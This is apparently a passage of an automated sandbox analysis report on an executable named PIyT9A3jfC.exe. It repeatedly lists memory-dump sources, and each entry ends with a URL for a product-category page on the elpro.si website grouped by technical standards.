                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-53-eu/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60584/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60751/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/ams-2750/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/cqi/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/din-en-301-489/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-12830/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-13060/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-285/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/fcm-ec-1935-2004/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-11140-4/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-15883/
